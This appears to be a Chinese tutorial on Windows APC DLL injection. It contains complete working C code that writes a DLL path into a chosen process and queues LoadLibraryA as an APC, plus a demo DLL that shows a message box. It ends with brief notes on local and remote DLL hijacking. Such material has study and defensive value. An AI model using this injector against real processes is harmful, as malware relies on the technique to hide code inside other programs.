主要是以下五步
//注入器
//1.要注入到进程中首先要拿到进程ID
//2.获取到LoadLibrary地址
//3.在目标程序的体内开辟一块内存,用来写入dll地址
//4.遍历线程-随便选一个目标进程的线程获取句柄
//5.插入APC,把LoadLibrary作为APC的回调参数,然后把目标进程的dll地址作为参数
#include<stdio.h>
#include<stdlib.h>
#include<Windows.h>
#include<TlHelp32.h>
typedef HMODULE (WINAPI *myLoadLibraryA)(
__in LPCSTR lpLibFileName
);
BOOL APC_IN(DWORD dwPid, char *DllPath) {
SIZE_T stWriteRetSize = 0;
myLoadLibraryA myLoadFunc = (myLoadLibraryA)GetProcAddress(GetModuleHandleA("kernel32.dll"),"LoadLibraryA");//获取LoadLibraryA的地址
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
PVOID pAddress = VirtualAllocEx(hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pAddress, DllPath, (strlen(DllPath) + 1), &stWriteRetSize);
HANDLE hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, dwPid);
THREADENTRY32 te32 = { sizeof(THREADENTRY32) };
BOOL ret = Thread32First(hThreadSnap, &te32);
if (ret)
{
do
{
if (dwPid == te32.th32OwnerProcessID) {
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);//要打开线程
BOOL bApc = QueueUserAPC((PAPCFUNC)myLoadFunc, hThread, (ULONG_PTR)pAddress);
if (bApc) {
return TRUE;
}
else {
return FALSE;
}
}
} while (Thread32Next(hThreadSnap, &te32));
}
}
int main() {
DWORD dwProcessId = 0;
printf("PID:");
scanf("%d", &dwProcessId);
BOOL falg = APC_IN(dwProcessId,"C:\\Users\\rkvir\\Desktop\\APC_dll.dll");
if (falg) {
MessageBox(NULL, L"success", L"success", MB_OK);
}
else {
MessageBox(NULL, L"failed", L"failed", MB_OK);
}
system("pause");
return 0;
}
随便编写一个程序
然后在编写一个dll程序,让他弹个框
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include “stdafx.h”
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH://注入进程
MessageBox(NULL, L"hello my baby!", L"hello my baby!", MB_OK);
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
注入成功,
DLL劫持
大致分为本地劫持跟远程劫持
分别看exe调用的dll文件里是否用的是LoadLibrary*,还是LoadLibraryEx*
本地劫持就可以直接自己写个dll改名为想要的dll即可,远程的需要看返回地址,然后自己构造响应的函数